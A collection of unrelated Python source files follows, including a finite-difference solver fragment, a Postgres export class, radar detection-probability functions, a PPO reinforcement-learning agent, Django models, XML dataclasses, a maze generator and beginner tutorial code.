        A1[i,i+1] = 1/(2*dr)+r[i,0]/dr**2;
    A1[0,0]=1;
    A1[0,1]=-1;
    A1[n,n] = 1;
    ## Forcing vector for j = 0 (periodic neighbours: columns m-1 and 1).
    ff1=np.zeros((n+1,1));
    for i in range(1,n):
        ff1[i] = -(f[i,m-1]+f[i,1])/(r[i,0]*dtheta**2);
    ff1[n] = r[n,0]*U_t[n,0];  # exact value on the exterior boundary
    ## Solve for r*u_t on the line j = 0.
    g[:,0] = linalg.lstsq(A1,ff1)[0].reshape(n+1)
    ## j = m-1: same system, wrapping to column 0 for the right neighbour.
    Am = np.zeros((n+1,n+1));
    for i in range(1,n):
        Am[i,i-1] = (-1/(2*dr)+r[i,m-1]/(dr**2));
        Am[i,i] = -2*(r[i,m-1]/dr**2 + 1/(r[i,m-1]*dtheta**2));
        Am[i,i+1] = 1/(2*dr)+r[i,m-1]/dr**2;
    Am[0,0]=1;
    Am[0,1]=-1;
    Am[n,n] = 1;
    ## Forcing vector for j = m-1 (periodic neighbours: columns m-2 and 0).
    ffm=np.zeros((n+1,1));
    for i in range(1,n):
        ffm[i] = -(f[i,m-2]+f[i,0])/(r[i,m-1]*dtheta**2);
    ffm[n] = r[n,m-1]*U_t[n,m-1];  # exact value on the exterior boundary
    ## Solve for r*u_t on the line j = m-1.
    g[:,m-1] = linalg.lstsq(Am,ffm)[0].reshape(n+1)
    return g
|
from data_transfer import DataTransfer
import csv
import psycopg2
def table_list(connect_par):
    """Return the names of all tables in the 'public' schema of the database
    reachable through `connect_par`."""
    with psycopg2.connect(connect_par) as con:
        with con.cursor() as cur:
            # Ask the information schema for the source DB's table list.
            cur.execute("""SELECT table_name
                           FROM information_schema.tables
                           WHERE table_schema = 'public'""")
            return [row[0] for row in cur.fetchall()]
class DataTransferPostgres(DataTransfer):
    """Data transfer that reads rows from a source Postgres database and
    streams them into a tab-separated CSV file."""

    def __init__(
        self, config,
        source_pg_conn_str,
        pg_conn_str,
        pg_meta_conn_str,
        query, *args, **kwargs
    ):
        """
        :config: transfer configuration forwarded to DataTransfer
        :source_pg_conn_str: DSN of the Postgres DB the rows are read from
        :pg_conn_str: DSN of the target DB (handled by the base class)
        :pg_meta_conn_str: DSN of the metadata DB (handled by the base class)
        :query: SQL query whose result set is exported
        """
        super(DataTransferPostgres, self).__init__(
            config=config,
            pg_conn_str=pg_conn_str,
            pg_meta_conn_str=pg_meta_conn_str,
            query=query, *args, **kwargs
        )
        self.source_pg_conn_str = source_pg_conn_str
        self.query = query

    def provide_data(self, csv_file, context):
        """Execute `self.query` on the source DB and write every row to
        `csv_file` as tab-separated, backslash-escaped lines.

        Bug fix: the connection is now closed in a ``finally`` block, so it
        is no longer leaked when the query or the CSV write raises.
        """
        pg_conn = psycopg2.connect(self.source_pg_conn_str)
        try:
            pg_cursor = pg_conn.cursor()
            self.log.info("Executing query: {}".format(self.query))
            pg_cursor.execute(self.query)
            csvwriter = csv.writer(
                csv_file,
                delimiter="\t",
                quoting=csv.QUOTE_NONE,
                lineterminator="\n",
                escapechar='\\'
            )
            # Stream in batches of 1000 rows to bound memory usage.
            while True:
                rows = pg_cursor.fetchmany(size=1000)
                if not rows:
                    break
                csvwriter.writerows(rows)
        finally:
            pg_conn.close()
|
def arrayChange(inputArray):
    """Make `inputArray` strictly increasing by raising elements, and return
    the total amount added.

    Each element that is not greater than its predecessor is raised to
    predecessor + 1. Note: the list is modified in place (same behavior as
    the original implementation).

    Improvements over the original: no throwaway single-element list per
    iteration, and the continue/else ladder is flattened into one guard.
    """
    total = 0
    for i in range(1, len(inputArray)):
        if inputArray[i] <= inputArray[i - 1]:
            needed = inputArray[i - 1] + 1
            total += needed - inputArray[i]
            inputArray[i] = needed
    return total

arr = [1,1,1]
print(arrayChange(arr))
|
"""
Project: RadarBook
File: non_coherent_integration.py
Created by: Lee A. Harrison
One: 10/9/2018
Created with: PyCharm
Copyright (C) 2019 Artech House (artech@artechhouse.com)
This file is part of Introduction to Radar Using Python and MATLAB
and can not be copied and/or distributed without the express permission of Artech House.
"""
import sys
from numpy import exp, sqrt, finfo
from scipy.special import gammainc, gammaincinv, iv, binom
from Libs.detection.single_pulse import Q
def single_pulse_snr(pd, pfa, number_of_pulses, swerling_type):
    """
    Compute the required signal to noise ratio given a probability of detection and probability of false alarm.
    :param pd: The probability of detection.
    :param pfa: The probability of false alarm.
    :param number_of_pulses: The number of pulses to be integrated.
    :param swerling_type: The Swerling model type.
    :return: The required signal to noise ratio.
    """
    # Bisection-style search: start at SNR = 1 with a large step, move up
    # when the achieved Pd is below the target and down otherwise, halving
    # the step each iteration until Pd matches the target to 1e-6.
    signal_to_noise = 1.0
    delta = 1000.0
    while True:
        if pd > probability_of_detection(signal_to_noise, pfa, number_of_pulses, swerling_type):
            signal_to_noise += delta
        else:
            signal_to_noise -= delta
            if signal_to_noise < 0.0:
                signal_to_noise = 1e-6  # keep the SNR strictly positive
        delta *= 0.5
        if abs(pd - probability_of_detection(signal_to_noise, pfa, number_of_pulses, swerling_type)) < 1e-6:
            break
    return signal_to_noise
def threshold_to_noise_ratio(probability_of_false_alarm, number_of_pulses):
    """
    Calculate the threshold to noise ratio.
    :param probability_of_false_alarm: The probability of false alarm.
    :param number_of_pulses: The number of pulses to be non-coherently integrated.
    :return: The threshold to noise ratio.
    """
    # Invert the regularized lower incomplete gamma function at 1 - Pfa.
    cumulative_probability = 1.0 - probability_of_false_alarm
    return gammaincinv(number_of_pulses, cumulative_probability)
def probability_of_detection(signal_to_noise, probability_of_false_alarm, number_of_pulses, target_type):
    """
    Calculate the probability of detection for Swerling targets
    (the original docstring said "Swerling 0" but every type is handled).
    :param signal_to_noise: The signal to noise ratio.
    :param probability_of_false_alarm: The probability of false alarm.
    :param number_of_pulses: The number of pulses to be non-coherently integrated.
    :param target_type: The Swerling target type (0, 1, 2, 3, or 4).
    :return: The probability of detection.
    """
    # Calculate the threshold to noise
    threshold_to_noise = threshold_to_noise_ratio(probability_of_false_alarm, number_of_pulses)

    if target_type == 'Swerling 0':
        # Non-fluctuating target: Marcum Q term plus a finite Bessel-function sum.
        s = 0
        for n in range(2, number_of_pulses + 1):
            s += (threshold_to_noise / (number_of_pulses * signal_to_noise)) ** (0.5 * (n - 1.0)) \
                 * iv(n-1, 2.0 * sqrt(number_of_pulses * signal_to_noise * threshold_to_noise))
        if s == float('inf'):
            s = sys.float_info.max  # clamp Bessel overflow to the largest finite float
        return Q(sqrt(2.0 * number_of_pulses * signal_to_noise), sqrt(2.0 * threshold_to_noise), 1e-6) \
               + exp(-threshold_to_noise - number_of_pulses * signal_to_noise) * s
    elif target_type == 'Swerling 1':
        # The eps keeps the gammainc first argument positive when number_of_pulses == 1.
        return 1.0 - gammainc(number_of_pulses - 1 + finfo(float).eps, threshold_to_noise) \
               + (1.0 + 1.0 / (number_of_pulses * signal_to_noise)) ** (number_of_pulses - 1) \
               * gammainc(number_of_pulses - 1 + finfo(float).eps, threshold_to_noise / (1.0 + 1.0 / (number_of_pulses * signal_to_noise))) \
               * exp(-threshold_to_noise / (1.0 + number_of_pulses * signal_to_noise))
    elif target_type == 'Swerling 2':
        return 1.0 - gammainc(number_of_pulses, threshold_to_noise / (1.0 + signal_to_noise))
    elif target_type == 'Swerling 3':
        return (1.0 + 2.0 / (number_of_pulses * signal_to_noise)) ** (number_of_pulses - 2) * \
               (1.0 + threshold_to_noise / (1.0 + 0.5 * number_of_pulses * signal_to_noise)
                - 2.0 * (number_of_pulses - 2.0) / (number_of_pulses * signal_to_noise)) \
               * exp(-threshold_to_noise / (1.0 + 0.5 * number_of_pulses * signal_to_noise))
    elif target_type == 'Swerling 4':
        # Finite binomial sum of incomplete-gamma terms.
        s = 0
        for k in range(number_of_pulses + 1):
            s += binom(number_of_pulses, k) * (0.5 * signal_to_noise) ** -k \
                 * gammainc(2 * number_of_pulses - k, 2 * threshold_to_noise / (signal_to_noise + 2.0))
        if s == float('inf'):
            s = sys.float_info.max  # clamp overflow to the largest finite float
        return 1.0 - (signal_to_noise / (signal_to_noise + 2.0)) ** number_of_pulses * s
|
from numpy import *
# Convert per-frame drum activation levels ('output.txt') into a CSV-style
# MIDI event list ('result.txt'), Note_on/Note_off events on channel 9.
drum = {}
drum[0] = '36'  # bass drum
drum[1] = '41'  # toms
drum[2] = '38'  # snares
drum[3] = '49'  # cymbals
drum[4] = '42'  # Hi-Hat
# Per-instrument activation thresholds, index-aligned with `drum`.
threshhold = [0.4,0.05,0.25,0.11,0.4]
with open('output.txt') as f:
    content = f.readlines()
delimiter = 120  # ticks between successive input frames
time = 0
random.seed(42)  # NOTE(review): seeded, but no random draw appears below
wr = open('result.txt','w')
for line in content:
    # One whitespace-separated activation value per instrument.
    i = line.split()
    for idx in range(len(i)):
        ok = False
        if(float(i[idx]) >= threshhold[idx]):
            wr.write("2, " + str(time) + ", Note_on_c, 9, " + drum[idx] + ", 95\n")
            ok = True
        if ok:
            # Schedule the matching note-off one frame later.
            wr.write("2, " + str(time+delimiter) + ", Note_off_c, 9, 0, 0\n")
    time = time + delimiter
wr.write("2, " + str(time) + ", End_track\n")
wr.close()
|
"""
날짜 : 2020/08/11
이름 : 이성진
내용 : 선형회귀 분석 실습하기
"""
# Fitted regression coefficients (slope `a`, intercept `b`).
a = 0.9767441021911394
b = -102.209288612913

# Heights to predict for.
x_data = [170, 155, 150, 175, 165, 180, 182, 173, 190, 188]

# Prediction model: linear regression y = slope * x + intercept.
# Generalized: slope/intercept are now parameters defaulting to the fitted
# values, so the same function works for any line (backward compatible).
def model(x, slope=a, intercept=b):
    """Return the linear prediction slope * x + intercept."""
    return slope * x + intercept

for x in x_data:
    print('%d에 대한 예측값 : %d' % (x, model(x)))
# 练习一下PPO立杆子,用pytorch重写的,但是train不动...
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import gym
# Hyperparameters
A_LR = 0.0001  # actor learning rate
C_LR = 0.0002  # critic learning rate
A_UPDATE_STEPS = 10  # actor updates per sampled minibatch
C_UPDATE_STEPS = 10  # critic updates per sampled minibatch
S_DIM, A_DIM = 3, 1  # state: cos(theta), sin(theta), theta_dot (angular velocity)
EPSILON = 0.2  # PPO surrogate clip range
class PPO(object):  # inheriting from `object` exposes the full set of magic methods
    """PPO agent (clipped surrogate objective), TF1 graph-mode implementation."""
    def __init__(self):
        self.sess = tf.Session()
        self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
        # Critic network: takes the state (to compute V(s)) and discounted_r
        # (fed from the main loop); outputs the advantage, squared into closs.
        with tf.variable_scope('critic'):
            l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu)
            self.v = tf.layers.dense(l1, 1)  # V(s)
            self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
            self.advantage = self.tfdc_r - self.v
            self.closs = tf.reduce_mean(tf.square(self.advantage))  # critic loss: squared advantage
            # The critic minimizes the advantage, pushing V(s) towards discounted_r.
            self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
        # Actor
        pi, pi_params = self._build_anet('pi', trainable=True)  # updated live
        # pi and oldpi are two distributions; their parameter lists are kept
        # so pi's weights can be copied into oldpi.
        oldpi, oldpi_params = self._build_anet('oldpi', trainable=False)  # oldpi is frozen; updated only by assignment
        with tf.variable_scope('sample_action'):  # action selection (with exploration noise)
            # NOTE(review): sampling from oldpi was tried but made the env produce NaNs.
            self.sample_op = tf.squeeze(pi.sample(1), axis=0)
            # pi is a distribution; pi.sample(1) is a tensor -- sess.run() yields numpy.
        with tf.variable_scope('update_oldpi'):  # copy pi's weights into oldpi
            self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
        self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action')  # the sampled (noisy) action
        self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
        with tf.variable_scope('loss'):
            with tf.variable_scope('surrogate'):  # the unclipped surrogate first
                # NOTE(review): the 1e-5 is added to the *action*, not the
                # probability -- likely meant oldpi.prob(self.tfa) + 1e-5; confirm.
                ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa + 1e-5))
                surr = ratio * self.tfadv
            # Clipped-surrogate objective, negated for minimization.
            self.aloss = -(tf.reduce_mean(tf.minimum(
                surr, tf.clip_by_value(ratio, 1 - EPSILON, 1 + EPSILON)*self.tfadv
            )))
        with tf.variable_scope('atrain'):
            self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
        self.sess.run(tf.global_variables_initializer())  # initialize the graph
        self.saver = tf.train.Saver()  # must be created last
    def _build_anet(self, name, trainable):  # build one actor network
        with tf.variable_scope(name):
            l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu, trainable=trainable)
            # The factor 2 scales tanh output to the action bound (a_bound).
            mu = 2 * tf.layers.dense(l1, A_DIM, tf.nn.tanh, trainable=trainable)
            sigma = tf.layers.dense(l1, A_DIM, tf.nn.softplus, trainable=trainable)  # softplus = smooth relu
            norm_dist = tf.distributions.Normal(loc=mu, scale=sigma)  # stochastic policy for exploration
            params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
        return norm_dist, params
    def update(self, s, a, r):  # one minibatch (e.g. 32 steps); r is the discounted reward
        self.sess.run(self.update_oldpi_op)  # oldpi always lags one update behind pi
        adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
        # Update network parameters.
        [self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv})for _ in range(A_UPDATE_STEPS)]
        # s feeds pi's distribution, a the ratio, adv the actor loss.
        [self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r})for _ in range(C_UPDATE_STEPS)]
        # s feeds V(s), which is compared with tfdc_r for the critic loss.
    def choose_action(self, s):
        s = s[np.newaxis, : ]
        a = self.sess.run(self.sample_op, {self.tfs: s})[0]
        # Tensors run through tf.Session.run() come back as numpy.
        return np.clip(a, -2, 2)  # clamp to the pendulum torque range (-2, 2)
    def get_v(self, s):  # state s in, V(s) out
        if s.ndim < 2: s = s[np.newaxis, : ]  # guard against a length-1 s collapsing to 0-d
        return self.sess.run(self.v, {self.tfs: s})[0, 0]
    def save_model(self, path):
        self.saver.save(self.sess, save_path = path)
        print('모델保存成功!'.replace('모델', '模型'))  # "model saved successfully"
    def load_model(self, path):
        self.saver.restore(self.sess, save_path = path)
        print('模型加载成功!')  # "model loaded successfully"
|
from django.db import models
from user.models import User
from .constants import COMPANY_TYPES, IntegerRangeField
# Create your models here.
class Company(models.Model):
    """A company that users can review."""
    name = models.CharField(max_length=100, verbose_name='Company Name :')
    type = models.CharField(max_length=50, verbose_name='Company Type :',
                            choices=COMPANY_TYPES)
    address = models.CharField(max_length=300, verbose_name='Company Address :')
    email = models.EmailField(verbose_name='Company contact E-mail :')
    phone = models.CharField(default='+880', verbose_name='Phone Number :', max_length=15)
    overview = models.CharField(max_length=500, verbose_name='Overview :')
    established = models.DateField(verbose_name='Established on :')
    timestamp = models.DateTimeField(auto_now_add=True)
    photo = models.ImageField(blank=True, null=True,
                              upload_to='company_photos/')

    def __str__(self):
        return '{company_name}'.format(company_name=self.name)

    def filtered_set(self, type):
        """Return all companies of the given type.

        Bug fix: the original evaluated ``Company.objects.all.filter`` --
        ``all`` was never called, so this raised AttributeError at runtime.
        """
        return Company.objects.all().filter(type=type)
class Review(models.Model):
    """A user's rating (1-5) and comment on a company."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    company = models.ForeignKey(Company, on_delete=models.CASCADE)
    rating = IntegerRangeField(max_value=5, min_value=1)
    comment = models.CharField(max_length=300, verbose_name='Comment :')
    timestamp = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return '{user} on {company}'.format(user=self.user, company=self.company)
|
# Copyright 2022 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This software is provided as-is,
# without warranty or representation for any use or purpose.
# Your use of it is subject to your agreement with Google.
from dataclasses import field
from decimal import Decimal
from pydantic.dataclasses import dataclass
from typing import List, Optional
from xsdata.models.datatype import XmlDateTime
@dataclass
class AddressType:
    """XML-bound address record: all location fields are required elements in
    the empty namespace; CustomerID is an optional attribute."""
    address: Optional[str] = field(
        default=None,
        metadata={
            "name": "Address",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    city: Optional[str] = field(
        default=None,
        metadata={
            "name": "City",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    region: Optional[str] = field(
        default=None,
        metadata={
            "name": "Region",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    postal_code: Optional[str] = field(
        default=None,
        metadata={
            "name": "PostalCode",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    country: Optional[str] = field(
        default=None,
        metadata={
            "name": "Country",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    customer_id: Optional[str] = field(
        default=None,
        metadata={
            "name": "CustomerID",
            "type": "Attribute",
        },
    )
@dataclass
class ShipInfoType:
    """XML-bound shipping record: carrier, freight cost and destination are
    required elements; ShippedDate is an optional attribute."""
    ship_via: Optional[int] = field(
        default=None,
        metadata={
            "name": "ShipVia",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    freight: Optional[Decimal] = field(
        default=None,
        metadata={
            "name": "Freight",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_name: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipName",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_address: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipAddress",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_city: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipCity",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_region: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipRegion",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_postal_code: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipPostalCode",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_country: Optional[str] = field(
        default=None,
        metadata={
            "name": "ShipCountry",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    shipped_date: Optional[XmlDateTime] = field(
        default=None,
        metadata={
            "name": "ShippedDate",
            "type": "Attribute",
        },
    )
@dataclass
class CustomerType:
    """
    Customer complex type: contact details plus a nested address.

    ``fax`` is the only optional child element; ``customer_id`` is an
    XML attribute.  Field metadata is consumed by xsdata and must match
    the schema exactly.
    """

    company_name: Optional[str] = field(
        default=None,
        metadata={
            "name": "CompanyName",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    contact_name: Optional[str] = field(
        default=None,
        metadata={
            "name": "ContactName",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    contact_title: Optional[str] = field(
        default=None,
        metadata={
            "name": "ContactTitle",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    phone: Optional[str] = field(
        default=None,
        metadata={
            "name": "Phone",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    # schema-optional: no "required" flag
    fax: Optional[str] = field(
        default=None,
        metadata={
            "name": "Fax",
            "type": "Element",
            "namespace": "",
        },
    )
    full_address: Optional[AddressType] = field(
        default=None,
        metadata={
            "name": "FullAddress",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    customer_id: Optional[str] = field(
        default=None,
        metadata={
            "name": "CustomerID",
            "type": "Attribute",
        },
    )
@dataclass
class OrderType:
    """
    Order complex type linking a customer and employee to shipping info.

    All child elements are schema-required.  Field metadata is consumed
    by xsdata and must match the schema exactly.
    """

    customer_id: Optional[str] = field(
        default=None,
        metadata={
            "name": "CustomerID",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    employee_id: Optional[str] = field(
        default=None,
        metadata={
            "name": "EmployeeID",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    order_date: Optional[XmlDateTime] = field(
        default=None,
        metadata={
            "name": "OrderDate",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    required_date: Optional[XmlDateTime] = field(
        default=None,
        metadata={
            "name": "RequiredDate",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    ship_info: Optional[ShipInfoType] = field(
        default=None,
        metadata={
            "name": "ShipInfo",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
@dataclass
class RootCustomers:
    """Container for the repeating <Customer> elements under <Customers>."""

    class Meta:
        # local (anonymous) type: not registered as a global schema type
        global_type = False

    customer: List[CustomerType] = field(
        default_factory=list,
        metadata={
            "name": "Customer",
            "type": "Element",
            "namespace": "",
        },
    )
@dataclass
class RootOrders:
    """Container for the repeating <Order> elements under <Orders>."""

    class Meta:
        # local (anonymous) type: not registered as a global schema type
        global_type = False

    order: List[OrderType] = field(
        default_factory=list,
        metadata={
            "name": "Order",
            "type": "Element",
            "namespace": "",
        },
    )
@dataclass
class Root:
    """Document root: one <Customers> container and one <Orders> container."""

    customers: Optional[RootCustomers] = field(
        default=None,
        metadata={
            "name": "Customers",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
    orders: Optional[RootOrders] = field(
        default=None,
        metadata={
            "name": "Orders",
            "type": "Element",
            "namespace": "",
            "required": True,
        },
    )
|
from random import randrange, sample, shuffle
from time import sleep
from maze import constants
from maze.tile.passage import Passage
from maze.tile.wall import Wall
from maze.tile.exit import Exit
from maze.tile.tunnel import Tunnel
class MazeGenerator:
    """
    Generator object for maze.

    Produces a (2*h + 1) x (2*w + 1) grid of tile objects using a
    randomized depth-first search ("recursive backtracker"), then
    carves tunnels into passages and cuts a single exit through the
    outer wall.
    """

    def __init__(self, w, h, window=None):
        # w, h count maze cells; the tile grid also holds the walls
        # between and around cells, hence the 2*n + 1 dimensions.
        self.__grid = None
        self.w = w
        self.h = h
        self.hMax = (2 * h) + 1
        self.wMax = (2 * w) + 1
        self.__window = window

    def grid(self):
        """Return the most recently generated grid (None before generate())."""
        return self.__grid

    def generate(self, animate=False):
        """
        create a maze layout

        When *animate* is truthy, each carving step is rendered with a
        short delay so construction can be watched.
        """
        grid = [[Wall() for c in range(self.wMax)] for r in range(self.hMax)]
        # random starting co-ords from 1 to index, multiples of 2
        c_row = randrange(1, self.hMax, 2)
        c_col = randrange(1, self.wMax, 2)
        stack = [(c_row, c_col)]
        grid[c_row][c_col] = Passage()
        while stack:
            (c_row, c_col) = stack[-1]
            neighbours = self._get_neighbours(c_row, c_col, grid)
            if not neighbours:
                # dead end: drop the current cell and backtrack
                stack = stack[:-1]
            else:
                # carve a passage into the neighbour and through the
                # wall tile separating it from the current cell
                n_row, n_col = neighbours[0]
                grid[n_row][n_col] = Passage()
                grid[(n_row + c_row) // 2][(n_col + c_col) // 2] = Passage()
                stack.append((n_row, n_col))
                if animate:
                    self._render(grid)
                    sleep(0.05)
        grid = self._carve_tunnels(grid)
        if animate:
            self._render(grid)
        grid = self._cut_exit(grid)
        if animate:
            self._render(grid)
        # BUG FIX: enable_game() used to be called unconditionally and
        # raised AttributeError when no window was supplied (e.g. the
        # CLI entry point constructs MazeGenerator without a window).
        if self.__window:
            self.__window.enable_game()
        self.__grid = grid
        return grid

    """
    internals
    """

    def _get_neighbours(self, x, y, grid):
        """
        get 'neighbouring' cells in a random order
        """
        n_list = []
        if x > 1 and grid[x - 2][y].get_type() == constants.maze_tile_wall:
            n_list.append((x - 2, y))
        if x < self.hMax - 2 and grid[x + 2][y].get_type() == constants.maze_tile_wall:
            n_list.append((x + 2, y))
        if y > 1 and grid[x][y - 2].get_type() == constants.maze_tile_wall:
            n_list.append((x, y - 2))
        if y < self.wMax - 2 and grid[x][y + 2].get_type() == constants.maze_tile_wall:
            n_list.append((x, y + 2))
        return sample(n_list, len(n_list))

    def _cut_exit(self, grid):
        """
        removes 1 square at random from the outer wall
        """
        exit_options = []
        exit_point = None
        while not exit_point:
            exit_options = self._generate_exit_options(exit_options)
            shuffle(exit_options)
            c_x, c_y, (t_x, t_y) = exit_options.pop()
            # (t_x, t_y) points one tile inward from the candidate
            d_x = c_x + t_x
            d_y = c_y + t_y
            # if this neighbour is empty, this is a valid exit
            if grid[d_y][d_x].get_type() == constants.maze_tile_passage:
                exit_point = (c_x, c_y)
        e_x, e_y = exit_point
        grid[e_y][e_x] = Exit()
        return grid

    def _carve_tunnels(self, grid):
        # TODO
        # ensure tunnels are a minimum distance from each other
        # ensure tunnels don't block the exit route (?)
        for depth in [1, 1, 2, 2]:
            # rejection-sample random tiles until we land on a passage
            while True:
                px, py = randrange(self.wMax), randrange(self.hMax)
                if grid[py][px].get_type() == constants.maze_tile_passage:
                    break
            grid[py][px] = Tunnel(depth)
        return grid

    def _generate_exit_options(self, options):
        """
        create randomised exit square list
        """
        if len(options) != 0:
            return options
        else:
            # one candidate per outer wall, paired with its inward direction
            top_wall = (randrange(1, self.wMax, 2), 0, (0, 1))
            left_wall = (0, randrange(1, self.hMax, 2), (1, 0))
            bottom_wall = (randrange(1, self.wMax, 2), self.hMax - 1, (0, -1))
            right_wall = (self.wMax - 1, randrange(1, self.hMax, 2), (-1, 0))
            return [top_wall, left_wall, right_wall, bottom_wall]

    def _render(self, grid):
        """Draw the grid to the window if one was supplied, else stdout."""
        display = []
        for y, _ in enumerate(grid):
            for x, _ in enumerate(grid[y]):
                sq = grid[y][x]
                display.append(sq.render_value())
            display.append('\n')
        maze = "".join(display)
        if self.__window:
            self.__window.update(maze)
        else:
            print(maze, flush=True)
if __name__ == "__main__":
    # quick manual run: build and animate a 10x10 maze on stdout
    generator = MazeGenerator(10, 10)
    maze = generator.generate(True)
|
# SECTION 5
# 1. Revisiting the Differences between Methods and Functions
mylist = [1, 2, 3, 4]
mylist.pop()  # <- Method: invoked on the list object itself
print(mylist)
# -> [1,2,3]
mylist = [1, 2, 3]
candidates = [1, 2, 3, 4, 100, 900]
max_number = max(candidates)  # <- Function: takes the list as an argument
# mylist.max() -> this isn't a thing because max is a function
# error -> unresolved attribute reference 'max' for class 'list'
print(max_number)  # -> 900
def myname(name):
    """Print a greeting for *name* (expects a string)."""
    greeting = "Hello " + name
    print(greeting)


myname("Evan")
# 2. Classes and Objects
class Vehicle:
    """A vehicle described by its body type and manufacturer."""

    def __init__(self, body_type, make):  # <- !!important!!
        # bind the constructor arguments to the instance via self so
        # every object (car1, car2, ...) carries its own copies
        self.vehicle_body = body_type
        self.vehicle_make = make
car1 = Vehicle('Sedan', 'Toyota')  # instantiating a Vehicle object
print(car1.vehicle_body)
print(car1.vehicle_make)

car2 = Vehicle('SUV', 'Subaru')
print(car2.vehicle_body)
print(car2.vehicle_make)

# type() reveals which class an instance was built from
print(type(car1))
# -> <class '__main__.Vehicle'>
# 3. Classes Attributes vs Object Attributes
class NewVehicle:
    """Vehicle variant demonstrating class attributes vs instance attributes."""

    # class attributes: defined once on the class and shared by all
    # instances; color should not be changed outside the class body
    color = 'red'
    vehicle_counter = 0

    def __init__(self, body_type, make):  # <- !!important!!
        # instance attributes: unique to each object
        self.vehicle_body = body_type
        self.vehicle_make = make
        # bump the shared counter every time a vehicle is created
        NewVehicle.vehicle_counter += 1

    def get_vehicle_count(self):
        return NewVehicle.vehicle_counter
car1 = NewVehicle('Sedan', 'Toyota')  # each instantiation bumps the class counter
print(car1.vehicle_body)
print(car1.vehicle_make)

car2 = NewVehicle('SUV', 'Subaru')
print(car2.vehicle_body)
print(car2.vehicle_make)

# the class attribute is reachable through any instance
print(car1.vehicle_counter)

# 4. Calling Python Code That is saved in another file.
# in vehicle application file
|
import numpy as np

# two random 3-vectors with entries drawn uniformly from {-1, 0, 1}
v1 = [np.random.randint(-1, 2) for _ in range(3)]
v2 = [np.random.randint(-1, 2) for _ in range(3)]
v = [v1, v2]
def i2pv(N, p):
    """
    Expand integer N into the list of residues ``N % p**i`` for
    i = 0, 1, ... while ``p**i < abs(N)``.

    Returns [0] when the loop never runs (e.g. N == 0 or |N| <= 1),
    so the result is never empty.
    """
    v = []
    i = 0
    while p**i < abs(N):
        v.append(N % p**i)
        i += 1
    # BUG FIX: the original duplicated `return v` inside this branch
    # immediately before the fall-through return — dead code removed.
    if not v:
        v.append(0)
    return v
def addfr(v):
    """
    Add two 4-component values whose last component acts as an
    exponent / shift index, aligning the lower-exponent operand with
    shift() before adding.

    v: pair of sequences shaped (a, b, c, i) — presumably truncated
    base-p expansions with valuation i; TODO confirm against callers.
    Returns (coefficient_triple, resulting_exponent).
    """
    # equal exponents: add the coefficient triples directly
    if v[0][3] == v[1][3]:
        return add([v[0][:-1], v[1][:-1]]), v[0][3]
    # otherwise shift the lower-exponent operand up by the difference
    elif v[0][3] < v[1][3]:
        return add([shift(*v[0][:-1], v[1][3] - v[0][3]), v[1][:-1]]), v[1][3]
    elif v[0][3] > v[1][3]:
        return add([shift(*v[1][:-1], v[0][3] - v[1][3]), v[0][:-1]]), v[0][3]
def shiftfr(a, b, c, i, j):
    """
    Shift the coefficient triple (a, b, c) right by j places with zero
    fill, advancing the exponent i by j.  Returns None for j outside 0..3.
    """
    shifted = {
        0: (a, b, c),
        1: (0, a, b),
        2: (0, 0, a),
        3: (0, 0, 0),
    }
    if j in shifted:
        return shifted[j] + (i + j,)
def shift(a, b, c, j):
    """
    Shift the coefficient triple (a, b, c) right by j places with zero
    fill.  Returns None for j outside 0..3.
    """
